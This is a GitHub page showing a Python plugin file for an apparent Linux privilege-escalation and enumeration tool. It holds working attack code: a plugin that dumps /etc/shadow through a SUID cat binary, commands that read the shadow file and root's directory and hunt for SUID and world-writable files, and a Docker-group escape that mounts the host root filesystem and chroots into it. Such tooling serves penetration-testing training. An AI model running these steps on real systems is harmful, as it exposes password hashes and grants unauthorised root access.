Skip to content
Permalink
27a2f3be03
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

OMARLEAP/src/omar_plugins.py

Go to file
 
 
Cannot retrieve contributors at this time
265 lines (221 sloc) 8.53 KB
Raw Blame
from plugins import PrivEsc, Enumeration
from os import popen
import os, tempfile
from subprocess import Popen, PIPE
import pty
import subprocess
import pathlib, stat
# A very basic method, but useful
def shellRun(command):
""" Put given commands into a temporary file, spawn a shell and explain how to use the command """
f = tempfile.NamedTemporaryFile(delete=False)
fname=f.name
f.write(command.encode())
f.close()
os.system(f"chmod u+x {fname}")
print(f"Execute command with '{fname}'...\nCtrl-D to leave shell")
#pty.spawn("/bin/bash")
#os.system(fname)
#os.unlink(fname)
"""An example plugin that tries to use `sudo su` to get root.
Requires being given the password for the current user and relies
on the current user having sudo privs, so while technically it
escalates proveleges, it does so only if you already have the
right credentials
"""
#shellRun("sudo passwd")
#shellRun("sudo id")
#shellRun("sudo -l")
def GrabOutput(command):
sp=subprocess.run(command, stdout=subprocess.PIPE)
return sp.stdout.decode()
def CheckBinary(p):
pl=pathlib.Path(p)
exists=pl.exists()
suid = False
if exists:
suid=(pl.stat().st_mode & stat.S_ISUID)!=0
return (exists, suid)
class linCatEscalator(PrivEsc):
def __init__(self):
self.name="CatEscalator"
self.author="Omar Alhendi"
self.description="Showing Restricted file /etc/shadow using misonfigured cat"
self.version=""
def execute(self):
catPath= "/bin/cat"
exists, suid = CheckBinary(catPath)
if not exists:
print(f"{catPath} doesn't exist")
return
if not suid:
print(f"cat doesn't have SUID bit set on")
return
out = GrabOutput([catPath, "/etc/shadow"])
print(out)
class HostInfo(Enumeration):
def __init__(self):
Enumeration.__init__(self)
self.name="Host Information"
self.author="Omar ALhendi"
self.description="Provides basic inforamdtion about the host"
self.version = "2.0"
def execute(self):
os.system("hostname")
os.system("whoami")
print(" Confidential And Users")
os.system("id")
os.system("who")
os.system("w")
os.system("last")
os.system("cat /etc/passwd | cut -d: -f1")
os.system("ps aux")
os.system("ps -ef")
print()
print(" Kernel Version")
os.system("uname -a")
os.system("uname -mrs")
os.system("rpm -q kernel")
os.system("dmesg | grep Linux")
os.system("ls /boot | grep vmlinuz-")
print()
print(" Environmental Variables")
os.system("cat /etc/profile")
os.system("cat /etc/bashrc")
os.system("cat ~/.bash_profile")
os.system("cat ~/.bashrc")
os.system("cat ~/.bash_logout")
os.system("env")
os.system("set")
print()
print(" Sensitive Information")
os.system("cat /etc/passwd")
os.system("cat /etc/group")
print()
print(" Files Privilegs")
os.system("ls -la")
class NetInfo(Enumeration):
def __init__(self):
Enumeration.__init__(self)
self.name="Network Information"
self.author="Omar ALhendi"
self.description="Provides basic inforamtion about the network"
self.version= "2.0"
def execute(self):
print()
os.system("ip")
os.system("ifconfig")
os.system("netstat -p")
os.system("route")
os.system("lsof -i")
os.system("lsof -i :80")
os.system("grep 80 /etc/services")
os.system("netstat -antup")
os.system("netstat -antpx")
os.system("netstat -tulpn")
os.system("chkconfig --list")
os.system("chkconfig --list | grep 3:on")
os.system("last")
os.system("w")
os.system("cat /etc/resolv.conf")
os.system("cat /etc/sysconfig/network")
os.system("cat /etc/networks")
os.system("iptables -L")
print()
print("Other Hosts and Computers Communicating")
os.system("netstat -antup")
os.system("netstat -antpx")
os.system("netstat -tulpn")
os.system("chkconfig --list")
class AppInfo(Enumeration):
def __init__(self):
Enumeration.__init__(self)
self.name="Applications and Services"
self.author="Omar ALhendi"
self.description="Provides Information about The Applications And Services"
def execute(self):
print()
print("Current Services Running")
os.system("ps aux")
os.system("ps -ef")
#os.system("top")
os.system("cat /etc/services")
print()
print("By Root")
os.system("ps aux | grep root")
os.system("ps -ef | grep root")
print()
print("Application Installed and Running")
os.system("dpkg -l")
os.system("rpm -qa")
os.system("ls -alh /var/cache/apt/archivesO")
os.system("ls -alh /var/cache/yum/")
lineBreak = "--------------------------------------" # Visual seperation
results = []
"""Find cron info. Ben Roxbee Cox"""
linSensitiveFiles = {"GROUP": {"cmd": "cat /etc/group", "msg": "Can You Read The Groups File?", "results": results},
"SHADOW": {"cmd": "cat /etc/shadow", "msg": "Can You Read The Shadow File?", "results": results},
"MAIL": {"cmd": "ls -alh /var/mail/", "msg": "Any Mail?", "results": results},
"ROOTDIR": {"cmd": "ls -al /root/", "msg": "Can you read the root directory?", "results": results},
"HOMEDIR": {"cmd": "ls -al /home/", "msg": "Any interesting files in the home directory?", "results": results},
"SGID": {"cmd": "find / -perm -g=s -type f 2>/dev/null", "msg": "Any useful SGID Files?"},
"SUID": {"cmd": "find / -perm -u=s -type f 2>/dev/null", "msg": "Any useful SUID Files?", "results": results},
"WRLDWX": {"cmd": "find / \( -perm -o w -perm -o x \) -type d 2>/dev/null", "msg": "World Writable & Executable Files", "results": results}
}
def findResults(eCommands):
"""Each item will pass through this function for subprocessing Ben's command dictionary
args:
eCommands : Dictionary containing commands to be progecessed.
returns:
eCommands : Dictionary with outputs populated.
"""
for command in eCommands:
cmd = eCommands[command]["cmd"]
output, error = subprocess.Popen([cmd], stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True).communicate()
results = output.split(b"/")
eCommands[command]["results"] = results
return eCommands
def showResults(output):
"""Print results found to the terminal.
args:
output : Dictionary of commands and outputs to be printed. Prints results of Ben's found enums
"""
for item in output:
msg = output[item]["msg"]
results = output[item]["results"]
print("\n\n" +"[+] " + msg + "\n" + lineBreak)
for result in results:
if result.strip() != "":
print(result.decode("utf") + " ", end="")
print("\n")
return
class linCronInfo(Enumeration):
def __init__(self):
Enumeration.__init__(self)
self.name="Cron Jobs"
self.author="Ben Roxbee Cox"
self.description="List running Cron jobs"
return
def execute(self):
linCronInfo = {"CRON": {"cmd": "ls -p -la /etc/cron* 2>/dev/null",
"msg": "Scheduled cron jobs", "results": results},
"CRONW": {"cmd": "ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null",
"msg": "Writable cron dirs", "results": results}
}
enumPer = linCronInfo
enumPerameter = findResults(enumPer)
showResults(enumPerameter)
return
class docker(PrivEsc):
def __init__(self):
self.name="Exploit Docker"
self.author="Ben Roxbee Cox"
self.description="Exploits a known vulnerability if a user is in the Docker group"
self.version=""
return
def execute(self):
id = popen("id").read() # Get user groups
if "docker" in id: os.system("docker run -it -v /:/mnt alpine chroot /mnt") # priv esc
return()